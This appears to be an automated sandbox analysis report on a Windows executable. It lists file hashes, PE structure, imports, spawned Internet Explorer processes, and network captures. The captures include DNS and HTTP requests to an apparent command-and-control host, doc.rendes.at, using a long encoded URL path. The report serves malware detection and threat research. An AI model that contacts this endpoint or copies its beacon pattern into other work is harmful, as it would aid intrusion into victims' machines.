SHA1:4356788CAEB2FCB84DE904A7B168D7F696E45E17
SHA-256:1F5940FFAD29BFDBFDD1726D070CAE1F6D8A5678EA0265E793DD5106B80F9F99
SHA-512:268C6AD044318D14509FF2C6BD015A9A4F8ACA9946EDBB8F2323599A9CF0F253477D054838167AF8C6DA393339581B7ED53B32964C413953DF4F7581A489C066
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):237
Entropy (8bit):6.1480026084285395
Encrypted:false
MD5:9FB559A691078558E77D6848202F6541
SHA1:EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F5B32550-C6EC-11E8-A1F8-44AC2DAE138A}.dat
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:Microsoft Word Document
Size (bytes):21592
Entropy (8bit):1.7627604255262714
Encrypted:false
MD5:A06D7B4CA86645FD6907B1248E3B4775
SHA1:6CD6CC371A1B08EE05C14EE8513496A353569982
SHA-256:037DC37D0382D95D73B98219FEEBF099F1FDC96F8A51B71A13BAE885B9B05D50
SHA-512:7616DA33EB92F11B6270C1BF746C7E339CB67693A321176DD53E7E98E2E3D7186AC638FB3810B70891F29B775D878B9E1D845411A5220840D0815724D35AABFD
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F5B32552-C6EC-11E8-A1F8-44AC2DAE138A}.dat
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:Microsoft Word Document
Size (bytes):16984
Entropy (8bit):1.5772396259895078
Encrypted:false
MD5:4AA3ABB003514E1CEFC4BD0847C6CBD6
SHA1:9677A883402ABFFB3D1226223956FB2302D2884D
SHA-256:2226D184979E293213BED7F088811E4E8E789E3D28211568A6122DF0E50B3C71
SHA-512:14DDE72B90922243F49AC5E8BE62F4B42C91EFF2A1794D97CE169FA7D0231C1FD57F52E0A173BE3094DD94958A49E4581FE069B9E1FFB40FCFC388BDE9BDF0CC
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FF8G8DG0\favicon[1].ico
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):237
Entropy (8bit):6.1480026084285395
Encrypted:false
MD5:9FB559A691078558E77D6848202F6541
SHA1:EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:false
Reputation:low

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
doc.rendes.at47.254.153.156truefalsehigh

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://doc.rendes.at/wpapi/XlhPkWURsPeX9n/KdgCvOhJyTpK7WR6Gbx1E/EGIHNIQTXREQOMps/rPc05MTJOZBIhXE/5m9k63AYGwTnA9kVzH/_2BvJ_2Bu/qT25s_2Bd32_2FwmnoO7/VJJFaK5GX9ndvILO9eE/_2BmLslnLM1_2Bzpzpe8w6/7wEfNRxzT1pne/O97RG4NY/OoJbmGnwE2owDOmHjuVKPJu/as3X3i37Pg/GbArsAQV3tEr4y9/hOifalse
    unknown

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPCountryFlagASNASN NameMalicious
    47.254.153.156United States
    45102CNNIC-ALIBABA-CN-NET-APAlibabaChinaTechnologyCoLtdfalse

    Private

    IP
    192.168.2.255

    Static File Info

    General

    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):6.528337649042211
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:zbetcheckin_tracker_propan.exe
    File size:183296
    MD5:7e17f0f35d50f49407841372f24fbd38
    SHA1:921ad55a3f593239b906163cf1bb8001194822f3
    SHA256:934c3445fe9d1a3d4cca4d3ec09c9191d8f9067e13e58fa0b288cb520cd40785
    SHA512:8200be71fc9015e9160ce7a3f665a917e058c8ee8753c178f43cf62a519154cafd83125787b565748c9061d9fcbe3c96f65edfa2dbc01c17f0e20f540386a1d1
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(.."l..ql..ql..qK0.q...qK0.q:..q...qe..ql..q...qK0.qp..qK0.qm..qr..qm..qRichl..q........................PE..L....v.[...........

    File Icon

    Static PE Info

    General

    Entrypoint:0x40ca12
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
    DLL Characteristics:TERMINAL_SERVER_AWARE
    Time Stamp:0x5BB076BF [Sun Sep 30 07:09:51 2018 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:0
    File Version Major:5
    File Version Minor:0
    Subsystem Version Major:5
    Subsystem Version Minor:0
    Import Hash:65787a6837f68f71463896efdbebc84c

    Entrypoint Preview

    Instruction
    call 00007FBDAD823FE1h
    jmp 00007FBDAD820A8Bh
    mov eax, dword ptr [esp+04h]
    mov dword ptr [00436074h], eax
    ret
    push ebp
    lea ebp, dword ptr [esp-000002A8h]
    sub esp, 00000328h
    mov eax, dword ptr [0042C4A0h]
    xor eax, ebp
    mov dword ptr [ebp+000002A4h], eax
    push esi
    mov dword ptr [ebp+00000088h], eax
    mov dword ptr [ebp+00000084h], ecx
    mov dword ptr [ebp+00000080h], edx
    mov dword ptr [ebp+7Ch], ebx
    mov dword ptr [ebp+78h], esi
    mov dword ptr [ebp+74h], edi
    mov word ptr [ebp+000000A0h], ss
    mov word ptr [ebp+00000094h], cs
    mov word ptr [ebp+70h], ds
    mov word ptr [ebp+6Ch], es
    mov word ptr [ebp+68h], fs
    mov word ptr [ebp+64h], gs
    pushfd
    pop dword ptr [ebp+00000098h]
    mov esi, dword ptr [ebp+000002ACh]
    lea eax, dword ptr [ebp+000002ACh]
    mov dword ptr [ebp+0000009Ch], eax
    mov dword ptr [ebp-28h], 00010001h
    mov dword ptr [ebp+00000090h], esi
    mov eax, dword ptr [eax-04h]
    push 00000050h
    mov dword ptr [ebp+0000008Ch], eax
    lea eax, dword ptr [ebp-80h]
    push 00000000h
    push eax
    call 00007FBDAD823FDEh
    lea eax, dword ptr [ebp-80h]
    mov dword ptr [ebp-30h], eax
    lea eax, dword ptr [ebp-28h]
    add esp, 0Ch
    mov dword ptr [ebp-80h], C000000Dh
    mov dword ptr [ebp-74h], esi
    mov dword ptr [ebp-2Ch], eax

    Data Directories

    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x2ab500x64.rdata
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x1458.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x18b680x40.rdata
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x170000x218.rdata
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

    Sections

    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x1562a0x15800False0.545387445494data6.51475744719IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    .rdata0x170000x146f60x14800False0.76806640625data6.25790724155IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .data0x2c0000xac180x1200False0.344835069444data3.39487152334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
    .rsrc0x370000x14580x1600False0.437144886364data4.50632518873IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

    Resources

    NameRVASizeTypeLanguageCountry
    RT_CURSOR0x374d80x134data
    RT_CURSOR0x376280x134data
    RT_ICON0x377880x568GLS_BINARY_LSB_FIRST
    RT_ICON0x37cf00x468GLS_BINARY_LSB_FIRST
    RT_DIALOG0x372f00xe2data
    RT_DIALOG0x373d80xe2data
    RT_GROUP_CURSOR0x374c00x14Lotus 1-2-3
    RT_GROUP_CURSOR0x376100x14Lotus 1-2-3
    RT_GROUP_ICON0x377600x22MS Windows icon resource - 2 icons, 16x16, 256-colors
    RT_VERSION0x381580x19cdata
    RT_MANIFEST0x382f80x15aASCII text, with CRLF line terminators

    Imports

    DLLImport
    USER32.dllDefWindowProcA, MessageBoxA, DestroyWindow, UpdateWindow, ShowWindow, GetMenu, AdjustWindowRect, EndDialog, InvalidateRect, wsprintfA, SetWindowTextA, DrawMenuBar, BeginPaint, EndPaint, IsIconic, MoveWindow, PostQuitMessage, GetWindowLongA, DialogBoxParamA, LoadStringA, EnableMenuItem, GetWindowRect, SendMessageA, SetWindowPos, PostMessageA, GetMessageA, TranslateMessage, DispatchMessageA, MessageBeep, LoadIconA, LoadCursorA, RegisterClassA, GetSystemMetrics, CreateWindowExA
    comdlg32.dllGetOpenFileNameA
    VERSION.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
    KERNEL32.dllGetDateFormatA, RtlUnwind, InitializeCriticalSection, Sleep, CompareStringA, GetCurrentProcessId, InterlockedDecrement, GetCurrentThreadId, SetLastError, InterlockedIncrement, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, IsDebuggerPresent, GetVersionExA, CompareStringW, GlobalFindAtomW, GlobalAddAtomW, GlobalFlags, GetTickCount, GetACP, GetLocaleInfoA, RaiseException, HeapFree, HeapAlloc, GetProcessHeap, GetStartupInfoW, GetSystemTimeAsFileTime, ExitProcess, VirtualAlloc, GetProcAddress, GetModuleHandleA, GetVersion, GetCurrentProcess, WideCharToMultiByte, WriteFile, LoadLibraryA, lstrcpyA, LCMapStringW, MultiByteToWideChar, CreatePipe, GetExitCodeProcess, SetFilePointer, GetDriveTypeA, GetCurrentDirectoryA, CreateFileA, SetEnvironmentVariableW, SetEnvironmentVariableA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, IsValidLocale, EnumSystemLocalesA, GetStringTypeW, GetStringTypeA, GetConsoleMode, GetConsoleCP, GetTimeZoneInformation, GetTimeFormatA, QueryPerformanceCounter, VirtualFree, HeapCreate, HeapDestroy, GetStartupInfoA, SetHandleCount, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleFileNameA, GetStdHandle, FlushFileBuffers, LCMapStringA, IsValidCodePage, GetOEMCP, GetCPInfo, VirtualQuery, GetSystemInfo, VirtualProtect, HeapSize, GetFileType, SetStdHandle, HeapReAlloc, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess

    Version Infos

    DescriptionData
    InternalNameIMSG
    FileDescriptionParser
    FileVersion1748
    CompanyNameloxlox
    Translation0x0409 0x04b0

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Oct 3, 2018 11:16:29.028738976 CEST5598453192.168.2.28.8.8.8
    Oct 3, 2018 11:16:29.415028095 CEST53559848.8.8.8192.168.2.2
    Oct 3, 2018 11:16:29.426309109 CEST4923380192.168.2.247.254.153.156
    Oct 3, 2018 11:16:29.427006006 CEST4923480192.168.2.247.254.153.156
    Oct 3, 2018 11:16:29.450634956 CEST804923347.254.153.156192.168.2.2
    Oct 3, 2018 11:16:29.450643063 CEST804923447.254.153.156192.168.2.2
    Oct 3, 2018 11:16:29.450722933 CEST4923380192.168.2.247.254.153.156
    Oct 3, 2018 11:16:29.450733900 CEST4923480192.168.2.247.254.153.156
    Oct 3, 2018 11:16:29.452330112 CEST4923380192.168.2.247.254.153.156
    Oct 3, 2018 11:16:29.476313114 CEST804923347.254.153.156192.168.2.2
    Oct 3, 2018 11:16:32.098453045 CEST5078353192.168.2.28.8.8.8
    Oct 3, 2018 11:16:32.103457928 CEST5130353192.168.2.28.8.8.8
    Oct 3, 2018 11:16:32.113343000 CEST53507838.8.8.8192.168.2.2
    Oct 3, 2018 11:16:32.118056059 CEST53513038.8.8.8192.168.2.2
    Oct 3, 2018 11:16:32.121105909 CEST5552253192.168.2.28.8.8.8
    Oct 3, 2018 11:16:32.135778904 CEST53555228.8.8.8192.168.2.2
    Oct 3, 2018 11:16:33.461882114 CEST5939853192.168.2.28.8.8.8
    Oct 3, 2018 11:16:33.471844912 CEST5580353192.168.2.28.8.8.8
    Oct 3, 2018 11:16:33.476080894 CEST53593988.8.8.8192.168.2.2
    Oct 3, 2018 11:16:33.486018896 CEST53558038.8.8.8192.168.2.2

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Oct 3, 2018 11:16:29.028738976 CEST5598453192.168.2.28.8.8.8
    Oct 3, 2018 11:16:29.415028095 CEST53559848.8.8.8192.168.2.2
    Oct 3, 2018 11:16:32.098453045 CEST5078353192.168.2.28.8.8.8
    Oct 3, 2018 11:16:32.103457928 CEST5130353192.168.2.28.8.8.8
    Oct 3, 2018 11:16:32.113343000 CEST53507838.8.8.8192.168.2.2
    Oct 3, 2018 11:16:32.118056059 CEST53513038.8.8.8192.168.2.2
    Oct 3, 2018 11:16:32.121105909 CEST5552253192.168.2.28.8.8.8
    Oct 3, 2018 11:16:32.135778904 CEST53555228.8.8.8192.168.2.2
    Oct 3, 2018 11:16:33.461882114 CEST5939853192.168.2.28.8.8.8
    Oct 3, 2018 11:16:33.471844912 CEST5580353192.168.2.28.8.8.8
    Oct 3, 2018 11:16:33.476080894 CEST53593988.8.8.8192.168.2.2
    Oct 3, 2018 11:16:33.486018896 CEST53558038.8.8.8192.168.2.2

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Oct 3, 2018 11:16:29.028738976 CEST192.168.2.28.8.8.80xd536Standard query (0)doc.rendes.atA (IP address)IN (0x0001)

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
    Oct 3, 2018 11:16:29.415028095 CEST8.8.8.8192.168.2.20xd536No error (0)doc.rendes.at47.254.153.156A (IP address)IN (0x0001)

    HTTP Request Dependency Graph

    • doc.rendes.at

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.24923347.254.153.15680C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Oct 3, 2018 11:16:29.452330112 CEST1OUTGET /wpapi/XlhPkWURsPeX9n/KdgCvOhJyTpK7WR6Gbx1E/EGIHNIQTXREQOMps/rPc05MTJOZBIhXE/5m9k63AYGwTnA9kVzH/_2BvJ_2Bu/qT25s_2Bd32_2FwmnoO7/VJJFaK5GX9ndvILO9eE/_2BmLslnLM1_2Bzpzpe8w6/7wEfNRxzT1pne/O97RG4NY/OoJbmGnwE2owDOmHjuVKPJu/as3X3i37Pg/GbArsAQV3tEr4y9/hOi HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: doc.rendes.at
    Connection: Keep-Alive


    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Start time:11:14:17
    Start date:03/10/2018
    Path:C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe
    Wow64 process (32bit):true
    Commandline:'C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe'
    Imagebase:0x400000
    File size:183296 bytes
    MD5 hash:7E17F0F35D50F49407841372F24FBD38
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low

    General

    Start time:11:16:07
    Start date:03/10/2018
    Path:C:\Program Files\Internet Explorer\iexplore.exe
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
    Imagebase:0x13ff20000
    File size:814288 bytes
    MD5 hash:446332D1A5576870E436B13AEB27CA8E
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low

    General

    Start time:11:16:08
    Start date:03/10/2018
    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Wow64 process (32bit):true
    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2296 CREDAT:275457 /prefetch:2
    Imagebase:0x260000
    File size:815304 bytes
    MD5 hash:F2831268EC600225F611DC02166EACF0
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low

    Disassembly

    Code Analysis

    Reset < >